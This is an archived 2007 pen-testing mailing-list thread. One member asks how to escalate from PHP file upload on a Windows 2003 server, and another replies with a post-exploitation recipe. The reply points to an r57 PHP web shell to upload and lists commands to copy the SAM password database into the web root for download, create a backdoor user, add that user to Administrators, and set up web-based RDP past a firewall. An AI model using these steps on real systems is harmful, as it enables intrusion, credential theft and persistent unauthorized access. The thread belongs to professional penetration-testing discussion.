Re: PHP Exploitation

From: DokFLeed (dokfleed@dokfleed.net)
Date: Sun Nov 25 2007 - 02:12:24 EST

• Next message: Kish Pent: "Re: PHP Exploitation"
• Previous message: Attari Attari: "Pen Test Success Factors"
• In reply to: Danux: "PHP Exploitation"
• Next in thread: Danux: "Re: PHP Exploitation"
• Reply: Danux: "Re: PHP Exploitation"
• Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]

I assume its for the good cause, and you are authorized to do so ?!

Upload this to the server
http://www.dokfleed.net/duh/modules.php?name=News&file=article&sid=46
encoded for Zend Optimizer
Or
http://no.spam.ee/~tonu/phpshell/r57shell.txt

Try the following commands:
=====================
1) To see whats running on system
    tasklist -SVC
2) To get a copy of the sam database
    copy C:\windows\repair\sam C:\www\sam.txt
    http://hostname/sam.txt
3) To add new user with username tested123 & password tested123
    net user tested123 tested123 /add /active:yes /expires:never
/passwordchg:yes /passwordreq:yes
4) To make him Administrator
    net localgroup Administrators tested123 /add
5) Try to RDP to the server , if it is Firewalled!!
Download the RDP web front "Remote Desktop Connection Web Connection
Software (455 KB)"
Start IIS http://hostname /TSweb/
and log to Localhost

remember while testing, your imagination is your limitation:),
depending on your phpinfo output none of this might work, so you will have
to code around it

Dok
Smoke Dope, Eat Soap, Fly Home in a Bubble

==================
----- Original Message -----
From: "Danux" <danuxx@gmail.com>
To: <pen-test@securityfocus.com>
Sent: Friday, November 23, 2007 6:29 AM
Subject: PHP Exploitation

> Hi experts, i need your ideas,
>
> By now, i am able to upload php files to a Windows 2003 Server, so i
> can execute php code like phpinfo, but i cant execute passthru command
> because of lack of IUSR_MACHINE privileges.
> I have run some local php bof's without success.
>
> Do you have another idea to break into the server through php code
> uploaded?
>
> Cheers!!!!!
>
> --
> Danux, CISSP
> Chief Information Security Officer
> Macula Security Consulting Group
> www.macula-group.com
>
> ------------------------------------------------------------------------
> This list is sponsored by: Cenzic
>
> Need to secure your web apps NOW?
> Cenzic finds more, "real" vulnerabilities fast.
> Click to try it, buy it or download a solution FREE today!
>
> http://www.cenzic.com/downloads
> ------------------------------------------------------------------------
>

------------------------------------------------------------------------
This list is sponsored by: Cenzic

Need to secure your web apps NOW?
Cenzic finds more, "real" vulnerabilities fast.
Click to try it, buy it or download a solution FREE today!

http://www.cenzic.com/downloads
------------------------------------------------------------------------

• Next message: Kish Pent: "Re: PHP Exploitation"
• Previous message: Attari Attari: "Pen Test Success Factors"
• In reply to: Danux: "PHP Exploitation"
• Next in thread: Danux: "Re: PHP Exploitation"
• Reply: Danux: "Re: PHP Exploitation"
• Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]

This archive was generated by hypermail 2.1.7 : Sat Apr 12 2008 - 10:58:13 EDT